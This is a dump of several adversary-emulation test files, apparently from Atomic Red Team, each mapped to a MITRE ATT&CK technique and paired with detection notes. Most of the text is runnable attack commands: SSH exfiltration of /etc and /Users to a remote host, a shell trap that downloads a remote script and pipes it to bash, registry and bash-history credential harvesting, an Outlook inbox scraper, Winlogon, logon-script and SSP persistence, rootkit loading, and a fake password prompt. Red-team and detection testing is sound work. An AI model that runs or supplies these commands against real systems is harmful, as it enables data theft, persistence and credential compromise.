9 | description: |
10 | Input a domain and test Exfiltration over SSH
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | input_arguments:
19 | domain:
20 | description: target SSH domain
21 | type: url
22 | default: target.example.com
23 | user_name:
24 | description: username for domain
25 | type: string
26 | default: atomic
27 | password:
28 | description: password for user
29 | type: string
30 | default: atomic
31 |
32 | executor_nix:
33 | name: sh
34 | command: |
35 | ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
36 | tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
37 |
38 | executor_man:
39 | name: manual
40 | steps: |
41 | 1. Victim System Configuration:
42 | mkdir /tmp/victim-staging-area
43 | echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
44 |
45 | 2. Using Python to establish a one-line HTTP server on victim system:
46 | cd /tmp/victim-staging-area
47 | python -m SimpleHTTPServer 1337
48 |
49 | 3. To retrieve the data from an adversary system:
50 | wget http://VICTIM_IP:1337/victim-file.txt
51 |
--------------------------------------------------------------------------------
/tests/T1154/T1154.md:
--------------------------------------------------------------------------------
1 | # T1154 - Trap
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
3 | The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.
4 |
5 | Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.
6 |
7 | Platforms: Linux, macOS
8 |
9 | Data Sources: File monitoring, Process Monitoring, Process command-line parameters
10 |
11 | Permissions Required: User, Administrator
12 |
13 | Remote Support: No
14 |
15 | ## Atomic Tests
16 |
17 | - [Atomic Test #1 - Trap](#atomic-test-1---trap)
18 |
19 |
20 |
21 |
22 | ## Atomic Test #1 - Trap
23 | After exiting the shell, the script will download and execute.
24 |
25 | After sending a keyboard interrupt (CTRL+C) the script will download and execute.
26 |
27 | **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
28 |
29 |
30 | #### Run it with `sh`!
31 | ```
32 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
33 | exit
34 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
35 | ```
36 |
37 |
--------------------------------------------------------------------------------
/tests/T1090/T1090.md:
--------------------------------------------------------------------------------
1 | # T1090 - Connection Proxy
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090)
3 | A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)
4 |
5 | The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
6 |
7 | The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
8 |
9 | ## Atomic Tests
10 |
11 | - [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy)
12 |
13 |
14 |
15 |
16 | ## Atomic Test #1 - Connection Proxy
17 | Enable traffic redirection.
18 |
19 | To undo changes made by this test:
20 | unset http_proxy
21 | unset https_proxy
22 |
23 | Note that this test may conflict with pre-existing system configuration.
24 |
25 | **Supported Platforms:** macOS, Linux
26 |
27 |
28 | #### Inputs
29 | | Name | Description | Type | Default Value |
30 | |------|-------------|------|---------------|
31 | | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
32 | | proxy_scheme | Protocol to proxy (http or https) | string | http|
33 |
34 | #### Run it with `sh`!
35 | ```
36 | export #{proxy_scheme}_proxy=#{proxy_server}
37 | ```
38 |
--------------------------------------------------------------------------------
/tests/T1214/T1214.md:
--------------------------------------------------------------------------------
1 | # T1214 - Credentials in Registry
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1214)
3 | The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
4 |
5 | Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
6 | *Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
7 | *Current User Hive: reg query HKCU /f password /t REG_SZ /s
8 |
9 | Detection: Monitor processes for applications that can be used to query the Registry, such as Reg, and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.
10 |
11 | Platforms: Windows
12 |
13 | Data Sources: Windows Registry, Process command-line parameters, Process Monitoring
14 |
15 | Permissions Required: User, Administrator
16 |
17 | System Requirements: Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys.
18 |
19 | Contributors: Sudhanshu Chauhan, @Sudhanshu_C
20 |
21 | ## Atomic Tests
22 |
23 | - [Atomic Test #1 - Enumeration for Credentials in Registry](#atomic-test-1---enumeration-for-credentials-in-registry)
24 |
25 |
26 |
27 |
28 | ## Atomic Test #1 - Enumeration for Credentials in Registry
29 | Queries to enumerate for credentials in the Registry.
30 |
31 | **Supported Platforms:** Windows
32 |
33 |
34 | #### Run it with `command_prompt`!
35 | ```
36 | reg query HKLM /f password /t REG_SZ /s
37 | reg query HKCU /f password /t REG_SZ /s
38 | ```
39 |
40 |
--------------------------------------------------------------------------------
/tests/T1152/T1152.md:
--------------------------------------------------------------------------------
1 | # T1152 - Launchctl
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1152)
3 | Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.
4 |
5 | Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
6 |
7 | Detection: Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.
8 |
9 | Platforms: macOS
10 |
11 | Data Sources: File monitoring, Process Monitoring, Process command-line parameters
12 |
13 | Defense Bypassed: Application whitelisting, Process whitelisting, Whitelisting by file name or path
14 |
15 | Permissions Required: User, Administrator
16 |
17 | Remote Support: No
18 |
19 | ## Atomic Tests
20 |
21 | - [Atomic Test #1 - Launchctl](#atomic-test-1---launchctl)
22 |
23 |
24 |
25 |
26 | ## Atomic Test #1 - Launchctl
27 | Utilize launchctl
28 |
29 | **Supported Platforms:** macOS
30 |
31 |
32 | #### Run it with `sh`!
33 | ```
34 | launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
35 | ```
36 |
37 |
--------------------------------------------------------------------------------
/tests/T1074/Discovery.bat:
--------------------------------------------------------------------------------
1 | net user Administrator /domain
2 | net Accounts
3 | net localgroup administrators
4 | net use
5 | net share
6 | net group "domain admins" /domain
7 | net config workstation
8 | net accounts
9 | net accounts /domain
10 | net view
11 | sc query
12 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
13 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
14 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
15 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
16 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
17 | reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
18 | reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
19 | reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
20 | reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
21 | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
22 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
23 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
24 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
25 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
26 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
27 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
28 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
29 | wmic useraccount list
30 | wmic useraccount get /ALL
31 | wmic startup list brief
32 | wmic share list
33 | wmic service get name,displayname,pathname,startmode
34 | wmic process list brief
35 | wmic process get caption,executablepath,commandline
36 | wmic qfe get description,installedOn /format:csv
37 | arp -a
38 | whoami
39 | ipconfig /displaydns
40 | route print
41 | netsh advfirewall show allprofiles
42 | systeminfo
43 | qwinsta
44 | quser
45 |
--------------------------------------------------------------------------------
/tests/T1139/T1139.md:
--------------------------------------------------------------------------------
1 | # T1139 - Bash History
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1139)
3 | Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
4 |
5 | Detection: Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history.
6 |
7 | Platforms: Linux, macOS
8 |
9 | Data Sources: File monitoring, Process monitoring, Process command-line parameters
10 |
11 | Permissions Required: User
12 |
13 | ## Atomic Tests
14 |
15 | - [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)
16 |
17 |
18 |
19 |
20 | ## Atomic Test #1 - xxxx
21 | xxxx
22 |
23 | **Supported Platforms:** Linux, macOS
24 |
25 |
26 | #### Inputs
27 | | Name | Description | Type | Default Value |
28 | |------|-------------|------|---------------|
29 | | bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
30 | | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
31 | | output_file | Path where captured results will be placed | Path | ~/loot.txt|
32 |
33 | #### Run it with `sh`!
34 | ```
35 | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/tests/T1050/T1050.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1050
3 | display_name: Service Installation
4 | tactic: Persistence, Privilege Escalation
5 | description: When operating systems boot up, they can start programs or applications called services that perform background system functions. Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution. **Requires Admin**
6 |
7 | atomic_tests:
8 | - name: Service Installation
9 | description: |
10 | Installs A Local Service
11 | Installs A Local Service via PowerShell
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | input_arguments:
17 | binary_path:
18 | description: Name of the service binary, include path.
19 | type: Path
20 | default: \mate\tests\T1050\bin\AtomicService.exe
21 | service_name:
22 | description: Name of the Service
23 | type: String
24 | default: AtomicTestService
25 |
26 | executor_cmd:
27 | name: command_prompt
28 | command: |
29 | sc.exe create AtomicService binPath= "\mate\tests\T1050\bin\AtomicService.exe"
30 | sc.exe start AtomicService
31 | sc.exe stop AtomicService
32 | sc.exe delete AtomicService
33 |
34 | executor_pwr:
35 | name: powershell
36 | command: |
37 | New-Service -Name AtomicService -BinaryPathName "\mate\tests\T1050\bin\AtomicService.exe"
38 | Start-Service -Name AtomicService
39 | Stop-Service -Name AtomicService
40 | (Get-WmiObject Win32_Service -filter "name='AtomicService'").Delete()
41 |
--------------------------------------------------------------------------------
/tests/T1007/T1007.md:
--------------------------------------------------------------------------------
1 | # T1007 - System Service Discovery
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
3 | Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.
4 |
5 | Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
6 |
7 | Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
8 |
9 | Platforms: Windows
10 |
11 | Data Sources: Process command-line parameters, Process monitoring
12 |
13 | Permissions Required: User, Administrator, SYSTEM
14 |
15 | ## Atomic Tests
16 |
17 | - [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)
18 |
19 |
20 |
21 |
22 | ## Atomic Test #1 - System Service Discovery
23 | Identify system services
24 |
25 | **Supported Platforms:** Windows
26 |
27 |
28 | #### Inputs
29 | | Name | Description | Type | Default Value |
30 | |------|-------------|------|---------------|
31 | | service_name | Name of service to start stop, query | string | svchost.exe|
32 |
33 | #### Run it with `command_prompt`!
34 | ```
35 | tasklist.exe
36 | sc query
37 | sc query state= all
38 | sc start #{service_name}
39 | sc stop #{service_name}
40 | wmic service where (displayname like "#{service_name}") get name
41 | ```
42 |
43 |
--------------------------------------------------------------------------------
/tests/T1114/Get-Inbox.ps1:
--------------------------------------------------------------------------------
1 | <#
2 | .SYNOPSIS
3 |
4 | Scrapes message data from the inbox of the current user and stores data in 'mail.csv' in the directory where the scrip was executed
5 |
6 | Outlook Email Collection
7 | MITRE ATT&CK - T1114
8 | Author: Greg Foss (@heinzarelli)
9 | Date: February, 2019
10 | License: BSD 3-Clause
11 |
12 | .EXAMPLE
13 |
14 | Display email contents in the terminal
15 | PS C:\> .\Get-Inbox.ps1
16 |
17 | Write emails out to a CSV
18 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
19 | #>
20 |
21 | [CmdLetBinding()]
22 | param( [string]$file )
23 |
24 | function Kill-Outlook {
25 |
26 | # Check to see if outlook is running, and close it to scrape mail data programmatically
27 | $outlook = Get-Process -Name Outlook -ErrorAction SilentlyContinue
28 | if ($outlook) {
29 | $outlook.CloseMainWindow()
30 | Sleep 5
31 | if (!$outlook.HasExited) {
32 | $outlook | Stop-Process -Force > $null
33 | }
34 | }
35 | Remove-Variable outlook > $null
36 | }
37 |
38 | function Scrape-Outlook {
39 |
40 | # Connect to the local outlook inbox and read mail
41 | Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null
42 | $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type]
43 | $inbox = new-object -comobject outlook.application
44 | $namespace = $inbox.GetNameSpace("MAPI")
45 | $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox)
46 | Write-Output "Please be patient, this may take some time..."
47 |
48 | # Output the data
49 | if ( $file ) {
50 | $folder.items |
51 | Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName, Body |
52 | Export-Csv -Path $file
53 | } else {
54 | $folder.items |
55 | Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName
56 | }
57 | }
58 |
59 | Kill-Outlook > $null
60 | Scrape-Outlook
61 | Kill-Outlook > $null
--------------------------------------------------------------------------------
/tests/T1014/T1014.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1014
3 | display_name: Loadable Kernel Module based Rootkit
4 |
5 | atomic_tests:
6 | - name: Loadable Kernel Module based Rootkit
7 | description: |
8 | Loadable Kernel Module based Rootkit
9 |
10 | supported_platforms:
11 | - linux
12 |
13 | input_arguments:
14 | rootkit_file:
15 | description: Path To Module
16 | type: String
17 | default: Module.ko
18 |
19 | executor:
20 | name: sh
21 | command: |
22 | sudo insmod #{rootkit_file}
23 | - name: Loadable Kernel Module based Rootkit
24 | description: |
25 | Loadable Kernel Module based Rootkit
26 |
27 | supported_platforms:
28 | - linux
29 |
30 | input_arguments:
31 | rootkit_file:
32 | description: Path To Module
33 | type: String
34 | default: Module.ko
35 |
36 | executor:
37 | name: sh
38 | command: |
39 | sudo modprobe #{rootkit_file}
40 | - name: LD_PRELOAD based Rootkit
41 | description: |
42 | LD_PRELOAD based Rootkit
43 |
44 | supported_platforms:
45 | - linux
46 |
47 | executor:
48 | name: sh
49 | command: |
50 | export LD_PRELOAD=$PWD/#{rootkit_file}
51 |
52 | - name: Windows Signed Driver Rootkit Test
53 | description: |
54 | This test exploits a signed driver to execute code in Kernel.
55 | SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
56 | We leverage the work done here:
57 | https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
58 | The hash of our PoC Exploit is
59 | SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
60 | This will simulate hiding a process.
61 | It would be wise if you only run this in a test environment
62 |
63 | supported_platforms:
64 | - windows
65 |
66 | input_arguments:
67 | driver_path:
68 | description: Path to the vulnerable driver
69 | type: Path
70 | default: C:\Drivers\driver.sys
71 |
72 | executor:
73 | name: command_prompt
74 | command: |
75 | puppetstrings #{driver_path}
76 |
--------------------------------------------------------------------------------
/tests/T1132/T1132.md:
--------------------------------------------------------------------------------
1 | # T1132 - Data Encoding
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1132)
3 | Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
4 |
5 | Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
6 |
7 | Platforms: Linux, macOS, Windows
8 |
9 | Data Sources: Packet capture, Process use of network, Process Monitoring, Network protocol analysis
10 |
11 | Permissions Required: User
12 |
13 | Requires Network: Yes
14 |
15 | Contributors: Itzik Kotler, SafeBreach
16 |
17 | ## Atomic Tests
18 |
19 | - [Atomic Test #1 - Base64 Encoded data.](#atomic-test-1---base64-encoded-data)
20 |
21 |
22 |
23 |
24 | ## Atomic Test #1 - Base64 Encoded data.
25 | Utilizing a common technique for posting base64 encoded data.
26 |
27 | **Supported Platforms:** macOS, Linux
28 |
29 |
30 | #### Inputs
31 | | Name | Description | Type | Default Value |
32 | |------|-------------|------|---------------|
33 | | destination_url | Destination URL to post encoded data. | string | redcanary.com|
34 | | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
35 |
36 | #### Run it with `sh`!
37 | ```
38 | echo -n 111-11-1111 | base64
39 | curl -XPOST #{base64_data}.#{destination_url}
40 | ```
41 |
42 |
--------------------------------------------------------------------------------
/tests/T1004/T1004.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1004
3 | display_name: Winlogon Helper DLL
4 |
5 | atomic_tests:
6 | - name: Winlogon Shell Key Persistence - PowerShell
7 | description: |
8 | PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | binary_to_execute:
15 | description: Path of binary to execute
16 | type: Path
17 | default: C:\Windows\System32\cmd.exe
18 |
19 | executor:
20 | name: powershell
21 | command: |
22 | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
23 |
24 | - name: Winlogon Userinit Key Persistence - PowerShell
25 | description: |
26 | PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
27 |
28 | supported_platforms:
29 | - windows
30 |
31 | input_arguments:
32 | binary_to_execute:
33 | description: Path of binary to execute
34 | type: Path
35 | default: C:\Windows\System32\cmd.exe
36 |
37 | executor:
38 | name: powershell
39 | command: |
40 | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
41 |
42 | - name: Winlogon Notify Key Logon Persistence - PowerShell
43 | description: |
44 | PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
45 |
46 | supported_platforms:
47 | - windows
48 |
49 | input_arguments:
50 | binary_to_execute:
51 | description: Path of notification package to execute
52 | type: Path
53 | default: C:\Windows\Temp\atomicNotificationPackage.dll
54 |
55 | executor:
56 | name: powershell
57 | command: |
58 | New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
59 | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
--------------------------------------------------------------------------------
/tests/T1142/T1142.md:
--------------------------------------------------------------------------------
1 | # T1142 - Keychain
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1142)
3 | Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
4 |
5 | To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.
6 |
7 | Detection: Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.
8 |
9 | Platforms: macOS
10 |
11 | Data Sources: System calls, Process Monitoring
12 |
13 | Permissions Required: Administrator
14 |
15 | ## Atomic Tests
16 |
17 | - [Atomic Test #1 - Keychain](#atomic-test-1---keychain)
18 |
19 |
20 |
21 |
22 | ## Atomic Test #1 - Keychain
23 | ### Keychain Files
24 |
25 | ~/Library/Keychains/
26 |
27 | /Library/Keychains/
28 |
29 | /Network/Library/Keychains/
30 |
31 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
32 |
33 | [Keychain dumper](https://github.com/juuso/keychaindump)
34 |
35 | **Supported Platforms:** macOS
36 |
37 |
38 | #### Run it with `sh`!
39 | ```
40 | security -h
41 | security find-certificate -a -p > allcerts.pem
42 | security import /tmp/certs.pem -k
43 | ```
44 |
45 |
--------------------------------------------------------------------------------
/tests/T1037/T1037.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1037
3 | display_name: Logon Scripts
4 | tactic: Lateral Movement, Persistence
5 | description: Windows logon scripts can be run whenever a specific user or group of users log into a system. The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in.
6 |
7 | atomic_tests:
8 | - name: Logon Scripts
9 | description: |
10 | Added Via Reg.exe
11 |
12 | supported_platforms:
13 | - windows
14 | - macos
15 |
16 | input_arguments:
17 | script_command:
18 | description: Command To Execute
19 | type: String
20 | default: cmd.exe /c calc.exe
21 |
22 | executor_cmd:
23 | name: command_prompt
24 | command: |
25 | REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "cmd.exe /c calc" /f
26 | REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
27 |
28 | executor_pwr:
29 | name: powershell
30 | command: |
31 | New-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Value 'cmd.exe' -PropertyType MultiString -Force
32 | Remove-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Force
33 |
34 | executor_nix:
35 | name: manual
36 | steps: |
37 | 1. Create the required plist file
38 | sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
39 |
40 | 2. Populate the plist with the location of your shell script
41 | sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
42 |
43 | 3. Create the required plist file in the target user's Preferences directory
44 | touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
45 |
46 | 4. Populate the plist with the location of your shell script
47 | defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
48 |
--------------------------------------------------------------------------------
/tests/T1037/T1037.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1037
3 | display_name: Logon Scripts
4 | tactic: Lateral Movement, Persistence
5 | description: Windows logon scripts can be run whenever a specific user or group of users log into a system. The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in.
6 |
7 | atomic_tests:
8 | - name: Logon Scripts
9 | description: |
10 | Added Via Reg.exe
11 |
12 | supported_platforms:
13 | - windows
14 | - macos
15 |
16 | input_arguments:
17 | script_command:
18 | description: Command To Execute
19 | type: String
20 | default: cmd.exe /c calc.exe
21 |
22 | executor_cmd:
23 | name: command_prompt
24 | command: |
25 | REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "cmd.exe /c calc" /f
26 | REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
27 |
28 | executor_pwr:
29 | name: powershell
30 | command: |
31 | New-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Value 'cmd.exe' -PropertyType MultiString -Force
32 | Remove-ItemProperty -Path "HKCU:\Environment" -Name UserInitMprLogonScript -Force
33 |
34 | executor_nix:
35 | name: manual
36 | steps: |
37 | 1. Create the required plist file
38 | sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
39 |
40 | 2. Populate the plist with the location of your shell script
41 | sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
42 |
43 | 3. Create the required plist file in the target user's Preferences directory
44 | touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
45 |
46 | 4. Populate the plist with the location of your shell script
47 | defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
48 |
--------------------------------------------------------------------------------
/tests/T1101/T1101.md:
--------------------------------------------------------------------------------
1 | # T1101 - Security Support Provider
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1101)
3 | Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.
4 | (Citation: Graeber 2014)
5 |
6 | ## Atomic Tests
7 |
8 | - [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry)
9 |
10 |
11 |
12 |
13 | ## Atomic Test #1 - Modify SSP configuration in registry
14 | Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
15 | **Supported Platforms:** Windows
16 |
17 |
18 | #### Inputs
19 | | Name | Description | Type | Default Value |
20 | |------|-------------|------|---------------|
21 | | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
22 |
23 | #### Run it with `powershell`!
24 | ```
25 | # run these in sequence
26 | $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
27 | $SecurityPackagesUpdated = $SecurityPackages
28 | $SecurityPackagesUpdated += "#{fake_ssp_dll}"
29 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
30 |
31 | # revert (before reboot)
32 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
33 | ```
34 |
--------------------------------------------------------------------------------
/tests/T1141/T1141.md:
--------------------------------------------------------------------------------
1 | # T1141 - Input Prompt
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1141)
3 | When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:
4 |
5 | set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")
